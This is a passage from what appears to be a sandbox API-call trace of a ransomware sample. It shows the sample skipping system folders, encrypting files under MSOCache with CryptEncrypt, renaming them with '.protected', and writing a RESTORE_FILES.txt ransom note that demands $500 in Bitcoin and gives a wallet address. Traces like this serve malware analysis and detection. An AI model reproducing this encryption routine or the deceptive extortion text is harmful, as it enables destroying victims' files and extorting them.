lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0053.603] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.604] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0053.604] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0053.604] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0053.832] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) 
returned 1 [0053.832] CloseHandle (hObject=0xb4) returned 1 [0053.956] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.protected") returned 88 [0053.956] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.protected")) returned 1 [0053.957] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Windows") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Program Files") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Program Files (x86)") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="$Recycle.bin") returned 1 [0053.957] lstrcmpiW (lpString1="WordMUI.xml", lpString2="System Volume Information") returned 1 [0053.957] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".protected") returned 0x0 [0053.957] lstrcmpW (lpString1="WordMUI.xml", lpString2="RESTORE_FILES.txt") returned 1 [0053.957] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0053.957] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0053.957] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0053.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrW (lpFirst="WordMUI.xml", lpSrch=".txt") returned 0x0 [0053.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrW (lpFirst="WordMUI.xml", lpSrch=".rar") returned 0x0 [0053.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0053.957] StrStrW (lpFirst="WordMUI.xml", lpSrch=".zip") returned 0x0 [0053.957] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x708, lpOverlapped=0x0) returned 1 [0053.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0053.994] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x708, lpOverlapped=0x0) returned 1 [0053.994] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0053.994] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0053.994] WriteFile (in: 
hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0053.994] CloseHandle (hObject=0xb4) returned 1 [0053.995] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.protected") returned 88 [0053.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.protected")) returned 1 [0053.995] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0053.995] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0053.996] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0053.996] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0053.996] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0053.996] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0053.997] lstrlenA (lpString="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") returned 684 [0053.997] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0053.997] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0053.997] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0053.997] CloseHandle (hObject=0xa4) returned 1 [0053.997] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0053.997] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0053.997] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned 66 [0053.997] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0053.997] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0053.997] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*") returned 68 [0053.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0054.068] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0054.068] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0054.068] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0054.068] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0054.068] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0054.068] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.") returned 68 [0054.068] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.068] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0054.068] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0054.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0054.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0054.068] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0054.069] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0054.069] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0054.069] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0054.069] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0054.069] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0054.069] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0054.069] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..") returned 69 [0054.069] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0054.069] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.069] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0054.069] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0054.069] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0054.069] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0054.069] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0054.069] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="Program Files") returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="Program Files (x86)") returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="$Recycle.bin") returned 1 [0054.069] lstrcmpiW (lpString1="Proof.en", lpString2="System Volume Information") returned -1 [0054.069] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned 75 [0054.069] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0054.069] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0054.069] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*") returned 77 [0054.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0054.069] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0054.069] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0054.070] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0054.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0054.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0054.070] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\.") returned 77 [0054.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.070] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0054.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0054.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0054.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0054.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0054.070] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\..") returned 78 [0054.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0054.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.070] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files") returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files (x86)") returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0054.070] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0054.070] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.070] StrStrIW (lpFirst="Proof.cab", lpSrch=".protected") returned 0x0 [0054.070] lstrcmpW (lpString1="Proof.cab", lpString2="RESTORE_FILES.txt") returned -1 [0054.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 
[0054.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.070] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.071] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.071] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0054.071] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.071] StrStrW (lpFirst="Proof.cab", lpSrch=".rar") returned 0x0 [0054.071] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0054.071] StrStrW (lpFirst="Proof.cab", lpSrch=".zip") returned 0x0 [0054.071] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.113] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.113] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.113] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 
1 [0054.113] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.126] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.127] CloseHandle (hObject=0x150) returned 1 [0054.544] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.protected") returned 95 [0054.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.protected")) returned 1 [0054.545] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files") returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files (x86)") returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0054.545] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0054.545] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrIW 
(lpFirst="Proof.msi", lpSrch=".protected") returned 0x0 [0054.545] lstrcmpW (lpString1="Proof.msi", lpString2="RESTORE_FILES.txt") returned -1 [0054.545] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0054.545] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.545] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0054.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrW (lpFirst="Proof.msi", lpSrch=".rar") returned 0x0 [0054.545] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0054.545] StrStrW (lpFirst="Proof.msi", lpSrch=".zip") returned 0x0 [0054.545] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.611] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.611] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.612] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.612] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.634] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.634] CloseHandle (hObject=0x150) returned 1 [0054.682] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.protected") returned 95 [0054.682] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.protected")) returned 1 [0054.683] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files") returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files (x86)") returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0054.683] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume 
